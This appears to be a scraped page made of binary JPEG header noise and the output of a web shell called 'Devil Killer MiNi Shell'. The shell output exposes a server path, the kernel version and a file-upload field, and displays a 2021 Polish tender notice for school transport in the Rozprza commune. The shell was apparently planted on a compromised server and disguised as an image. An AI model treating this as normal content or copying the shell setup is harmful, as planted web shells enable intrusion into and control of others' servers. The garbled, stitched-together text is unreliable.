JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210818/0015276601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE USŁUGI DOWOZU I ODWOZU DZIECI DO SZKÓŁ NA TERENIE GMINY ROZPRZA W ROKU SZKOLNYM 2021/2022 NA PODSTAWIE ZAKUPU BILETÓW MIESIĘCZNYCH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINNY ZESPÓŁ OŚWIATY W ROZPRZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590420593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sportowa 12A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rozprza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">446150900</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gzo@rozprza.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rozprza.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE USŁUGI DOWOZU I ODWOZU DZIECI DO SZKÓŁ NA TERENIE GMINY ROZPRZA W ROKU SZKOLNYM 2021/2022 NA PODSTAWIE ZAKUPU BILETÓW MIESIĘCZNYCH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-663595ed-000f-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00152766</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003558/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zakup biletów miesięcznych na dowóz dzieci do placówek oświatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między zamawiającym<br/>a wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl, poczty elektronicznej<br/>gzo@rozprza.pl, ePUAP https://epuap.gov.pl/wps/portal,<br/>Adres skrytki ePUAP: Gminny Zespół Oświaty w Rozprzy (/gzo-rozprza/SkrytkaESP).<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wszelkie informacje dotyczące podjętych przez zamawiającego czynności w postępowaniu są<br/>umieszczane na stronie internetowej https://miniportal.uzp.gov.pl.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w instrukcji użytkowania systemu<br/>https://miniportal.uzp.gov.pl/ dostępnej pod adresem https://www.uzp.gov.pl/e-zamowienia2/miniportal<br/>oraz regulaminie ePUAP,<br/>5. Korespondencja w postępowaniu i realizacja umowy prowadzona jest w języku polskim. Oznacza to,<br/>że wszelka korespondencja w języku obcym winna być złożona wraz z tłumaczeniem na język polski.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>7. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452) oraz rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. poz. 2415).<br/>9. Komunikacja pomiędzy zamawiającym, a wykonawcami (nie dotyczy składania ofert) w<br/>szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa<br/>się elektronicznie za pośrednictwem dedykowanego formularza: Formularz do komunikacji dostępnego<br/>na ePUAP oraz udostępnionego przez miniPortal.<br/>10. Wykonawca nie szyfruje korespondencji przesyłanej za pomocą Formularza do komunikacji.<br/>11. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy<br/>posługują się numerem referencyjnym sprawy, tj. GZO.271.3.2021<br/>12. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomogą poczty elektronicznej na adres email gzo@rozprza.pl lub zamowienia@rozprza.pl (z wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) administratorem Pani/Pana danych osobowych jest<br/>Gminny Zespół Oświaty, z którym można się skontaktować pod adresem: Gminny Zespół Oświaty w<br/>Rozprzy, 97-340 Rozprza, ul. Sportowa 12A, tel./fax: (0-44) 615-89-00, e-mail: gzo@rozprza.pl<br/>2) administrator wyznaczył Inspektora ochrony danych, z którym może Pani/Pan skontaktować się<br/>poprzez e-mail: inspektor@opsrozprza.pl.;<br/>3) Pani/Pana dane będą przetwarzane w celu prowadzenia przedmiotowego postępowania o<br/>udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy i jego<br/>archiwizacji.<br/>4) podstawą przetwarzania Pani/Pana danych osobowych jest niezbędność wypełnienia przez<br/>Administratora obowiązku prawnego, a podstawą prawną jest art. 6 ust. 1 lit. c RODO w związku z<br/>ustawą z 11 września 2019 r Prawo zamówień publicznych (Pzp) (Dz.U.2019.2019).<br/>5) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz Urząd Zamówień<br/>Publicznych prowadzący miniPortal do komunikacji elektronicznej działający pod adresem<br/>https://miniportal.uzp.gov.pl.<br/>6) Pani/Pana dane osobowe będą przetwarzane na podstawie przepisów prawa, przez okres<br/>niezbędny do realizacji celów przetwarzania<br/>7) obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp związanym z udziałem w postepowaniu o udzielenie zamówienia publicznego;<br/>8) w związku z przetwarzaniem Pani/Pana danych osobowych przysługują Pani/Panu, z wyjątkami<br/>zastrzeżonymi przepisami prawa, następujące uprawnienia:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania danych osobowych, przy czym skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowań oraz jego<br/>załączników;<br/>• na podstawie art. 18 RODO prawo do żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>• prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych<br/>osobowych, tj. Prezesa Urzędu Ochrony Danych Osobowych, na niezgodne z RODO przetwarzanie<br/>Pani/Pana danych osobowych przez Administratora.<br/>9) nie przysługuje Pani/Panu w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych oraz nie przysługuje prawo do przenoszenia danych osobowych, o których mowa w art. 20<br/>RODO.<br/>10) nie przysługuje Pani/Panu na podstawie art. 21 RODO prawo do sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c.<br/>11) Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany i nie będą przetwarzane w celu profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GZO.271.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> świadczenie usługi dowozu i odwozu dzieci do szkół na terenie gminy Rozprza w roku szkolnym<br/>2021/2022 na podstawie zakupu biletów miesięcznych w szacowanej ilości 331 szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2020-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>a.	„Cena ofertowa brutto za miesiąc” – A;<br/>b.	„Czas podstawienia autokaru zastępczego” – B;<br/>Powyższym kryteriom zamawiający przypisał następujące znaczenie:<br/><br/>Kryterium A: „Cena ” w PLN:<br/>a)	waga kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>A = (Amin / Ab) x 60 pkt <br/>gdzie:<br/>A- liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Amin - cena za miesiąc w ofercie z najniższą ceną <br/>Ab - cena za miesiąc w ofercie ocenianej <br/>Kryterium cena, która zostanie wyrażony w PLN, podana przez Wykonawcę w Formularzu Oferty, będzie oceniana zgodnie z powyższym wzorem.<br/><br/>Kryterium B: „Czas podstawienia autokaru zastępczego” w minutach:<br/>a)	waga kryterium - 40% (40 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Czas podstawienia autokaru zastępczego”: <br/> B = (Bn / Bb) x 100 x 40% <br/>gdzie:<br/>B - liczba uzyskanych punktów dla kryterium „Czas podstawienia autokaru zastępczego” ocenianej oferty<br/>Bn – Czas podstawienia autokaru zastępczego oferty z najkrótszym czasem <br/>Bb – Czas podstawienia autokaru zastępczego oferty badanej <br/><br/>Wykonawca podaje czas podstawienia autokaru zastępczego w minutach.<br/>Czas podstawienia autokaru zastępczego nie może być krótszy niż 30 minut oraz dłuższy niż 90 minut.<br/>Kryterium czas podstawienia autokaru zastępczego, który zostanie wyrażony w minutach, podany przez Wykonawcę w Formularzu Oferty, będzie oceniany zgodnie z powyższym wzorem.<br/>W przypadku podania przez wykonawcę czasu podstawienia autokaru zastępczego krótszego niż 30 minut i dłuższego niż 90 minut lub pozostawienie pola niewypełnionego skutkować będzie odrzuceniem oferty wykonawcy na podstawie art. 226 ust. 1 pkt 5 ustawy Prawo zamówień publicznych.<br/>Wybór oferty.<br/>Zamawiający wybierze ofertę, która otrzyma maksymalną liczbę punktów z sumy (S) ww. kryteriów tj.:<br/>A + B = S <br/>gdzie: <br/>A – Kryterium ceny <br/>B – Kryterium czas podstawienia autokaru zastępczego<br/>S – Suma kryteriów<br/>Punkty we wszystkich kryteriach zostaną zaokrąglone do dwóch miejsc po przecinku. <br/>Ilości punktów za poszczególne kryteria, zostaną zsumowane i będą stanowić końcową ocenę oferty. <br/>Maksymalnie w ostatecznej ocenie punktowej Wykonawca może uzyskać 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autokaru zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualne zezwolenie na wykonywanie<br/>krajowego, zarobkowego przewozu osób pojazdami samochodowymi lub licencję na<br/>wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 r.<br/>o transporcie drogowym (t.j. Dz. U. z 2019 r. poz. 2140 z późn. zm.).<br/>2) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli przedłoży wykaz wykonanych, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanych, minimum dwóch usług polegających na<br/>dowozie i odwozie dzieci dojeżdżających do placówek oświatowych na podstawie zakupu<br/>biletów miesięcznych o wartości nie mniejszej niż 200.000,00 zł brutto każda w okresie ostatnich<br/>3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania podmiotów, na rzecz<br/>których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w<br/>przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert- wg<br/>załącznika nr 3 do SIWZ; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego<br/>(zgodnie z załącznikiem nr 6 do SWZ);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru<br/>działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług w<br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania tj.: aktualnego zezwolenia na<br/>wykonywanie krajowego, zarobkowego przewozu osób pojazdami samochodowymi lub licencję na<br/>wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 r. o<br/>transporcie drogowym (t.j. Dz. U. z 2019 r. poz. 2140 z późn. zm.),<br/>2) wykaz usług, o których mowa w rozdziale 16 pkt 2 ppkt 4 lit a) wykonanych, a w przypadku<br/>świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu,<br/>dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz<br/>załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub<br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (zgodnie z załącznikiem nr 3 do SWZ);</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium.<br/>2. Każdy wykonawca zobowiązany jest wnieść wadium, na cały okres związania ofertą, w<br/>wysokości 3.000,00 zł (słownie: trzy tysiące 00/100 zł).<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>4. Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie winny zostać złożone w formie<br/>dokumentu elektronicznego oryginalnego, podpisanego kwalifikowanym podpisem<br/>elektronicznym. Dokument 